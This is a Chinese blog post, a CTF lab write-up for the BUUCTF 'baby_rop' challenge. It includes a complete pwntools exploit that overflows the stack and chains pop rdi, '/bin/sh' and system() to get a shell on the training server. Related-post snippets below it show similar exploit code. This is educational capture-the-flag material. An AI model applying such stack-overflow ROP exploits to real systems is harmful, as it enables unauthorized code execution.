buuctf|[HarekazeCTF2019]baby_rop 1

最新推荐文章于 2024-05-05 22:46:05 发布
最新推荐文章于 2024-05-05 22:46:05 发布
阅读量911 收藏 3
点赞数
分类专栏: buuctf pwn 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64236521/article/details/124547279
版权
buuctf 同时被 2 个专栏收录
10 篇文章 1 订阅
订阅专栏
pwn
6 篇文章 1 订阅
订阅专栏

buuctf|[HarekazeCTF2019]baby_rop 1

分析

下载文件重命名为pwn_15,checksec一下
在这里插入图片描述
只开启了NX,64位,用ida看看
在这里插入图片描述
这里可以栈溢出,同时在侧面看到了system()

shift+F12查看字符串在这里插入图片描述

在这里插入图片描述
找到binsh,由于是64位,我们要寄存器传参,ROPgadget下
在这里插入图片描述

exp如下

from pwn import*

p=remote('node4.buuoj.cn',25977)
#p=process("./pwn_15")

system_addr=0x400490
binsh_addr=0x601048
ret_addr=0x400479
popdi_addr=0x400683

payload=b'A'*0x18+p64(ret_addr)+p64(popdi_addr)+p64(binsh_addr)+p64(system_addr)
p.sendline(payload)

p.interactive()

flag

拿到控制权后

find -name flag

找到地址后cat,得flag
在这里插入图片描述

嚚_瘖
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
arm64_rop_exploit:Arm64返回定向编程(ROP)漏洞
03-02
arm64_rop_exploit arm64 rop小工具二进制文件,用于将arm64反向外壳程序代码映射到内存中并执行代码这仅适用于目标arm64设备。 用于将rop小工具映射到内存中并从libc库执行shell代码的源代码。 在运行Ubuntu 18.04....
[HarekazeCTF2019]baby_rop1
m0_64195960的博客
06-30 637
前言:有两个新的知识点,一个是寻找函数地址,一个是当flag不在根目录下的解决办法开启了栈不可执行保护我们看到了system函数,我们通过shift+f12找一下字符串呜呜它给的实在太多了,有system函数,有/bin/sh,有栈溢出下面介绍两种找system函数地址的方式(因为博主之前只会做那种白给后门函数的题,或者gdb找)注意:我们在这里不是嗯翻,一个程序plt装载的位置大概在灰色部分后面一点(具体原因就不展开啦)我们可以通过调上方彩色的部分来定位这个有点烦,但还是讲讲这样就可以直接获得的,比较发现
BUUCTF [HarekazeCTF2019]baby_rop
小白垃圾笔记2
05-13 189
不过因为这是64位程序,所以我们需要找一些东西的地址。main函数里直接是漏洞 ,第6行存在栈溢出。/bin/sh (当作system的参数)小白做题垃圾笔记,不建议阅读。system(调用系统函数·)pop rdi (用来传参)一次打不通可以多打几次。ret(用来栈对齐)
[HarekazeCTF2019]baby_rop[BUUCTF]
最新发布
moonlightsunshin的博客
05-05 286
这个时候思路就很清晰了根据64位函数传参的特点构造ROP链就行,32位与64位传参的区别这里就不再赘述,读者可以看上一篇jarvisoj_level2_x64[BUUCTF] ,根据名字可以猜到这道题考的rop同时是64位的程序。用find -name flag查找路径再cat。
CTF buuoj pwn-----[HarekazeCTF2019]baby_rop
bing_Max的博客
10-11 1896
exp from pwn import * sh = remote('node4.buuoj.cn', 342414) # 连接一个远程靶机。 elf = ELF('./babyrop') # elf函数调用,elf可以 bin_sh_addr = 0x601048 system_addr = 0x601060 pop_rdi_addr = 0x400683 payload = b'a'*0x10 + b'a'*8 + p64(pop_rdi_addr)+p64(bin_sh_addr)+p64(
BUUCTF PWN [HarekazeCTF2019]baby_rop
Rt1Text的博客
05-27 319
1.checksec+运行 64位/NX堆栈不可执行 2.IDA进行中 1.main函数 本题函数倒不是很多 很明显,格式化字符串漏洞 2.system bin/sh 3.offset 总体来看64位寄存器传参 3.EXP from pwn import* p=remote('node4.buuoj.cn',27198) shell=0x601048 system=0x400496 rdi=0x400683 payload=b'a'*(...
buuctf|pwn-[HarekazeCTF2019]baby_rop-wp
l2645470582_的博客
11-08 211
1.例行检查 我们看到该文件开启了堆保护 2.我们用64位的IDA打开该文件 按shift+f12查看关键字符串,我们看到“/bin/sh”这个关键字符串 我们双击查看它的位置:0x0601048 3.我们去main函数里面看看 我们发现v4 = var_10,他的地址为:0x10 我们要拿到权限:system("/bin/sh") 所以我们要找到system地址:0x0400490 我们双击_system,system在plt表里面 4...
[HarekazeCTF2019]baby_rop
、moddemod
06-12 391
exp from pwn import * context(log_level = 'debug') proc_name = './babyrop' elf = ELF(proc_name) # p = process(proc_name) p = remote('node3.buuoj.cn', 25587) pop_rdi_ret = 0x400683 bin_sh_str = 0x601048 system_addr = elf.sym['system'] payload = 'a'.en...
rop-sample.rar_.comrop_rop_rop源码下载_taobao netty
09-20
《ROP技术解析与Netty应用实战》 ROP(Return-Oriented Programming,返回导向编程)是一种高级的利用技术,常用于安全领域,特别是在软件漏洞利用中。ROP允许攻击者通过跳转到现有代码片段(通常称为“gadgets”)...
pwn学习资料整理——ROP技术(pwn_rop2)
08-30
pwn学习资料整理——ROP技术(pwn_rop2)
STM8_Unlock_Flash_ROP_issue_ROPCLEAR_unlock_stm8s003_stm8s103_
10-03
在STM8S103型号中,涉及到的"Unlock Flash ROP issue"指的是在编程或擦除闪存时可能遇到的问题,尤其是与Read-Out Protection (ROP)功能有关的障碍。ROP是一种安全特性,它防止未经许可的读取和复制微控制器内部的...
PWN——Buuoj [HarekazeCTF2019]baby_rop
u014377094的博客
01-21 724
先用IDA64打开,发现scanf看一眼存入数据的位置 熟悉的味道 按一下shift f12 system函数和/bin/sh都给了那就不客气了 困难题我唯唯诺诺,简单题我重拳出击 思路明确,现在还需要pop rdi,ret来传一下参数(str“/bin/sh)到system里 这个时候用到了ROPgadget 里面的babyrop是这道题的文件名,其他题换一下就ok 现在找到了地址,准备工作完成,敲python 有一点需要注意的是,咱们明明找的是400683,搁ida里咋面目
[BUUCTF]PWN——[HarekazeCTF2019]baby_rop2
mcmuyanga的博客
10-04 4211
[HarekazeCTF2019]baby_rop2 题目附件 步骤: 例行检查,64位,开启了nx保护 运行了一下程序,了解大概的执行情况 64位ida载入,shift+f12检索程序里的字符串,没有发现可以直接利用的,从main函数开始看程序 利用思路: 程序很简单,buf的大小是0x20,但是读入的时候读入的是0x100,会造成溢出,我们要想办法覆盖返回地址为” system(‘/bin/sh’)“,那样在执行13行语句的时候,程序回去调用我们布置好的栈,从而得到shell 但是程序里没有现成
buuctf刷题(2)【13题 - 】
像初雪一样自由洒落
05-16 370
not_the_same_3dsctf_2016 一开始看到这两个函数,直接栈溢出,跳过来不就行了,,,没注意看,get_secret,是指将flag读入了f14g,并没有打印出来呢,所以我们还需要自己打印一下 搜了一下,有write函数,那就调用它 #coding=utf-8 from pwn import * connect = 1#连接本地 fileName=''#文件名 port='node3.buuoj.cn'#端口 ip='29206'#IP地址 main_addr = 0x
[HarekazeCTF2019]baby_rop2
、moddemod
06-17 367
exp #!/usr/bin/env python3 # coding=utf-8 from pwn import * from LibcSearcher import * context(log_level = 'debug') proc_name = './babyrop2' p = process(proc_name) # p = remote('node3.buuoj.cn', 29966) elf = ELF(proc_name) print(proc.pidof(p)) main_add..
buuctf [HarekazeCTF2019]baby_rop2
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取shell权限。解题的过程中,通过找到rsi寄存器的地址,将其设置为read函数的地址,然后再通过调用printf函数,将read函数的地址泄漏出来,从而计算libc基址。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值